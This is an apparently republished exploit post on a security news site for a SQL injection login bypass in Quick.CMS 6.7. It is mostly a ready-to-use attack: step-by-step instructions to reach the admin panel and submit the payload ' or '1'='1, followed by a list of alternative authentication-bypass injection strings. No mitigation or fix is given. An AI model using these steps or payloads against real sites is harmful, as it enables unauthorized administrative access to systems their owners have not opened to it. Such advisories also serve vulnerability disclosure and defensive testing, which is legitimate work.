Exploit/Advisories no image

Published on March 20th, 2024 📆 | 2118 Views ⚑

0

Quick.CMS 6.7 SQL Injection – Torchsec


Powered by iSpeech

Quick.CMS 6.7 SQL Injection
Posted Mar 19, 2024
Authored by H4X.Forensics

Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, sql injection
SHA-256 | cd96d379383fd6bc85ab4e185183931ea6b236dd9b5c004203a06f94f9bd9b70
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
# Google Dork: N/A
# Date: 02-03-2024
# Exploit Author: ./H4X.Forensics - Diyar
# Vendor Homepage: https://www.opensolution.org
# Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]
# Version: 6.7
# Tested on: Windows
# CVE : N/A

How to exploit :

*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
*--> Enter any Email like : root@root.com
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Tick the Checkbox
*--> Press Login
*--> Congratz!

*--> SQL Injection Authentication Bypass Payload : ' or '1'='1





*--> Payloads Can be use :

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '

Source link

Tagged with:



Comments are closed.